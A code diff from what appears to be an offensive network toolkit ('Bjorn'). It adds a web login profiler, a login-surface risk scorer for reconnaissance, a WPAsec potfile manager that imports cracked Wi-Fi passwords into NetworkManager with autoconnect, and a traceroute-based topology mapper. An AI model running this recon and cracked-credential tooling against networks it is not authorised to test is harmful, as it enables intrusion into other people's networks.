ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""


@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
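Worked through by hand, the weights above give intuitive orderings; this standalone copy of the heuristic scores an exposed Basic-auth login against a CSRF- and rate-limit-protected one:

```python
# Standalone copy of the _score_signals heuristic, exercised on two profiles.
def score(signals):
    s = 0
    if str(signals.get("auth_type") or "").lower() in {"basic", "digest"}:
        s += 45
    if signals.get("looks_like_login"):
        s += 35
    if signals.get("has_csrf"):
        s += 10
    if signals.get("rate_limited_hint"):
        s -= 25  # defensive signal: deprioritize noisy follow-ups
    hints = signals.get("framework_hints") or []
    if hints:
        s += min(10, 3 * len(hints))
    return max(0, min(100, s))

open_basic = score({"auth_type": "basic", "looks_like_login": True})
guarded = score({"looks_like_login": True, "has_csrf": True,
                 "rate_limited_hint": True, "framework_hints": ["django"]})
print(open_basic, guarded)  # 80 23
```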
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
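The ranking step in `execute()` reduces to a few lines; this sketch (with illustrative 3-tuples instead of the real 5-tuples) mirrors the sort-by-(score, status), top-N slice, and average:

```python
# Sketch of the ranking step above: sort scored tuples by (score, status)
# descending, keep the top entries, and compute an integer average score.
scored = [(23, "/login", 200), (80, "/admin", 401), (0, "/robots.txt", 200)]
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:2]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored)))
print(top, avg)
```

The `max(1, ...)` guard keeps the average well-defined when no profiler rows exist for the target.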

actions/wpasec_potfiles.py Normal file

@@ -0,0 +1,319 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
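The API-key prefill can be demonstrated end to end with a throwaway settings file (the temp path here is illustrative, not the real `~/.settings_bjorn` location, and the copied-dict pattern is a sketch of the behavior, not the function itself):

```python
# Sketch of the prefill pattern in compute_dynamic_b_args: read a saved
# settings JSON and inject its value as the field's default, without
# mutating the original b_args definition.
import json
import os
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    settings_path = os.path.join(tmp, "wpasec_settings.json")  # illustrative path
    with open(settings_path, "w", encoding="utf-8") as f:
        json.dump({"api_key": "SECRET123"}, f)

    b_args = {"key": {"type": "text", "label": "API key (WPAsec)", "help": ""}}
    d = {k: dict(v) for k, v in b_args.items()}  # shallow-copy each field
    with open(settings_path, "r", encoding="utf-8") as f:
        saved = json.load(f)
    if saved.get("api_key") and not d["key"].get("default"):
        d["key"]["default"] = saved["api_key"]
        d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"

print(d["key"]["default"], d["key"]["help"].strip())
```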
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()
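The two potfile line formats accepted by `_parse_potfile_line` can be exercised standalone; a minimal sketch of the same parsing rules (the sample lines below are illustrative, not real captures):

```python
def parse_potfile_line(line: str):
    """Mirror of _parse_potfile_line: returns (ssid, password) or (None, None)."""
    if line.startswith("$WPAPSK$") and "#" in line:
        try:
            ssid_hash, password = line.split(":", 1)
            # SSID sits between the "$WPAPSK$" prefix and the "#" separator
            return ssid_hash.split("#")[0].replace("$WPAPSK$", ""), password
        except ValueError:
            return None, None
    fields = line.split(":")
    if len(fields) == 4:
        # WPA-sec potfile style: BSSID:StationMAC:SSID:password
        return fields[2], fields[3]
    return None, None
```

Lines that match neither shape (wrong field count, no separator) fall through to `(None, None)`, which is what lets the import/erase loops skip malformed entries silently.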

847
actions/yggdrasil_mapper.py Normal file
View File

@@ -0,0 +1,847 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
the routing path to the target IP. Records hop IPs and RTT per hop.
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
optionally verifies a handful of key ports with TCP connect probes.
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
No matplotlib or networkx dependency -- pure JSON output.
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import os
import socket
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="yggdrasil_mapper.py", level=logging.DEBUG)
# Silence scapy logging before import
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
_SCAPY_AVAILABLE = False
try:
from scapy.all import IP, ICMP, sr1, conf as scapy_conf
scapy_conf.verb = 0
_SCAPY_AVAILABLE = True
except ImportError:
logger.warning("scapy not available; falling back to subprocess traceroute")
except Exception as exc:
logger.warning(f"scapy import error ({exc}); falling back to subprocess traceroute")
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_status = "yggdrasil_mapper"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 10
b_cooldown = 3600
b_rate_limit = "3/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 6
b_risk_level = "low"
b_enabled = 1
b_tags = ["topology", "network", "recon", "mapping"]
b_category = "recon"
b_name = "Yggdrasil Mapper"
b_description = (
"Network topology mapper that discovers routing paths via traceroute, enriches "
"nodes with service data from the DB, and saves a merged JSON topology graph. "
"Lightweight -- no matplotlib or networkx required."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "YggdrasilMapper.png"
b_args = {
"max_depth": {
"type": "slider",
"label": "Max trace depth (hops)",
"min": 5,
"max": 30,
"step": 1,
"default": 15,
"help": "Maximum number of hops for traceroute probes.",
},
"probe_timeout": {
"type": "slider",
"label": "Probe timeout (s)",
"min": 1,
"max": 5,
"step": 1,
"default": 2,
"help": "Timeout in seconds for each ICMP / TCP probe.",
},
}
b_examples = [
{"max_depth": 15, "probe_timeout": 2},
{"max_depth": 10, "probe_timeout": 1},
{"max_depth": 30, "probe_timeout": 3},
]
b_docs_url = "docs/actions/YggdrasilMapper.md"
# -------------------- Constants --------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
_VERIFY_PORTS = [22, 80, 443, 445, 3389, 8080]
# -------------------- Helpers --------------------
def _generate_mermaid_topology(topology: Dict[str, Any]) -> str:
"""Generate a Mermaid.js diagram string from topology data."""
lines = ["graph TD"]
# Define styles
lines.append(" classDef target fill:#f96,stroke:#333,stroke-width:2px;")
lines.append(" classDef router fill:#69f,stroke:#333,stroke-width:1px;")
lines.append(" classDef unknown fill:#ccc,stroke:#333,stroke-dasharray: 5 5;")
nodes = topology.get("nodes", {})
for node_id, node in nodes.items():
label = node.get("hostname") or node.get("ip")
node_type = node.get("type", "unknown")
# Sanitize the node id for Mermaid (ids cannot contain '.', '*' or '-'); the
# label stays human-readable because it is emitted inside quotes.
safe_id = node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")
lines.append(f' {safe_id}["{label}"]')
if node_type == "target":
lines.append(f" class {safe_id} target")
elif node_type == "router":
lines.append(f" class {safe_id} router")
else:
lines.append(f" class {safe_id} unknown")
edges = topology.get("edges", [])
for edge in edges:
src = str(edge.get("source", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
dst = str(edge.get("target", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
if src and dst:
rtt = edge.get("rtt_ms", 0)
if rtt > 0:
lines.append(f" {src} -- {rtt}ms --> {dst}")
else:
lines.append(f" {src} --> {dst}")
return "\n".join(lines)
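The id sanitization and edge rendering above can be isolated into one small helper; a sketch assuming the same replacement rules (the exact output spacing here is my own choice, not the generator's):

```python
def mermaid_edge(src: str, dst: str, rtt_ms: int = 0) -> str:
    """Render one topology edge as a Mermaid arrow, sanitizing node ids."""
    def safe(node_id: str) -> str:
        # Mermaid node ids cannot contain '.', '*' or '-'
        return node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")
    s, d = safe(src), safe(dst)
    # Annotate the link with the RTT only when a real measurement exists
    return f"{s} -- {rtt_ms}ms --> {d}" if rtt_ms > 0 else f"{s} --> {d}"
```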
def _reverse_dns(ip: str) -> str:
"""Best-effort reverse DNS lookup. Returns hostname or empty string."""
try:
hostname, _, _ = socket.gethostbyaddr(ip)
return hostname or ""
except Exception:
return ""
def _tcp_probe(ip: str, port: int, timeout_s: float) -> Tuple[bool, int]:
"""
Quick TCP connect probe. Returns (is_open, rtt_ms).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
t0 = time.time()
try:
rc = s.connect_ex((ip, int(port)))
rtt_ms = int((time.time() - t0) * 1000)
return (rc == 0), rtt_ms
except Exception:
return False, 0
finally:
try:
s.close()
except Exception:
pass
def _scapy_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
ICMP traceroute using scapy. Returns list of hop dicts:
[{"hop": 1, "ip": "x.x.x.x", "rtt_ms": 12}, ...]
"""
hops: List[Dict[str, Any]] = []
for ttl in range(1, max_depth + 1):
pkt = IP(dst=target, ttl=ttl) / ICMP()
t0 = time.time()
reply = sr1(pkt, timeout=timeout_s, verbose=0)
rtt_ms = int((time.time() - t0) * 1000)
if reply is None:
hops.append({"hop": ttl, "ip": "*", "rtt_ms": 0})
continue
src = reply.src
hops.append({"hop": ttl, "ip": src, "rtt_ms": rtt_ms})
# Reached destination
if src == target:
break
return hops
def _subprocess_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
Fallback traceroute using the system `traceroute` command.
Works on Linux / macOS. On Windows falls back to `tracert`.
"""
import subprocess
import re
hops: List[Dict[str, Any]] = []
# Decide command based on platform
if os.name == "nt":
cmd = ["tracert", "-d", "-h", str(max_depth), "-w", str(int(timeout_s * 1000)), target]
else:
cmd = ["traceroute", "-n", "-m", str(max_depth), "-w", str(int(timeout_s)), target]
try:
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=max_depth * timeout_s + 30,
)
output = proc.stdout or ""
except FileNotFoundError:
logger.error("traceroute/tracert command not found on this system")
return hops
except subprocess.TimeoutExpired:
logger.warning(f"Subprocess traceroute to {target} timed out")
return hops
except Exception as exc:
logger.error(f"Subprocess traceroute error: {exc}")
return hops
# Parse output lines
ip_pattern = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
rtt_pattern = re.compile(r'(\d+(?:\.\d+)?)\s*ms')
hop_num = 0
for line in output.splitlines():
stripped = line.strip()
if not stripped:
continue
# Skip header lines
parts = stripped.split()
if not parts:
continue
# Try to extract hop number from first token
try:
hop_candidate = int(parts[0])
except (ValueError, IndexError):
continue
hop_num = hop_candidate
ip_match = ip_pattern.search(stripped)
rtt_match = rtt_pattern.search(stripped)
hop_ip = ip_match.group(1) if ip_match else "*"
hop_rtt = int(float(rtt_match.group(1))) if rtt_match else 0
hops.append({"hop": hop_num, "ip": hop_ip, "rtt_ms": hop_rtt})
# Stop if we reached the target
if hop_ip == target:
break
return hops
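The per-line extraction in `_subprocess_traceroute` can be checked against representative `traceroute -n` output; a standalone sketch of the same regex logic (the sample lines in the test are illustrative):

```python
import re

_IP_RE = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
_RTT_RE = re.compile(r'(\d+(?:\.\d+)?)\s*ms')

def parse_hop_line(line: str):
    """Extract (hop, ip, rtt_ms) from one traceroute output line; None for headers."""
    parts = line.strip().split()
    if not parts:
        return None
    try:
        hop = int(parts[0])  # header lines ("traceroute to ...") fail here
    except ValueError:
        return None
    ip_m = _IP_RE.search(line)
    rtt_m = _RTT_RE.search(line)
    # Unanswered hops render as "*" with a zero RTT, matching the scapy path
    return hop, (ip_m.group(1) if ip_m else "*"), (int(float(rtt_m.group(1))) if rtt_m else 0)
```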
def _load_existing_topology(output_dir: str) -> Dict[str, Any]:
"""
Load the most recent aggregated topology JSON from output_dir.
Returns an empty topology skeleton if nothing exists yet.
"""
skeleton: Dict[str, Any] = {
"version": b_version,
"nodes": {},
"edges": [],
"metadata": {
"created": datetime.utcnow().isoformat() + "Z",
"updated": datetime.utcnow().isoformat() + "Z",
"run_count": 0,
},
}
if not os.path.isdir(output_dir):
return skeleton
# Find the latest aggregated file
candidates = []
try:
for fname in os.listdir(output_dir):
if fname.startswith("topology_aggregate") and fname.endswith(".json"):
fpath = os.path.join(output_dir, fname)
candidates.append((os.path.getmtime(fpath), fpath))
except Exception:
return skeleton
if not candidates:
return skeleton
candidates.sort(reverse=True)
latest_path = candidates[0][1]
try:
with open(latest_path, "r", encoding="utf-8") as fh:
data = json.load(fh)
if isinstance(data, dict) and "nodes" in data:
return data
except Exception as exc:
logger.warning(f"Failed to load existing topology ({latest_path}): {exc}")
return skeleton
def _merge_node(existing: Dict[str, Any], new: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two node dicts, preferring newer / non-empty values."""
merged = dict(existing)
for key, val in new.items():
if val is None or val == "" or val == []:
continue
if key == "open_ports":
# Union of port lists
old_ports = set(merged.get("open_ports") or [])
old_ports.update(val if isinstance(val, list) else [])
merged["open_ports"] = sorted(old_ports)
elif key == "rtt_ms":
# Keep lowest non-zero RTT
old_rtt = merged.get("rtt_ms") or 0
new_rtt = val or 0
if old_rtt == 0:
merged["rtt_ms"] = new_rtt
elif new_rtt > 0:
merged["rtt_ms"] = min(old_rtt, new_rtt)
else:
merged[key] = val
merged["last_seen"] = datetime.utcnow().isoformat() + "Z"
return merged
def _edge_key(src: str, dst: str) -> str:
"""Canonical edge key (sorted to avoid duplicates)."""
a, b = sorted([src, dst])
return f"{a}--{b}"
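Because `_edge_key` sorts its endpoints, the two directions of the same link collapse to one key; a minimal dedup sketch showing that property:

```python
def edge_key(src: str, dst: str) -> str:
    """Canonical undirected edge key: sorted endpoints joined with '--'."""
    a, b = sorted([src, dst])
    return f"{a}--{b}"

def dedup_edges(edges):
    """Keep the first edge seen for each undirected link."""
    seen, out = set(), []
    for e in edges:
        k = edge_key(e["source"], e["target"])
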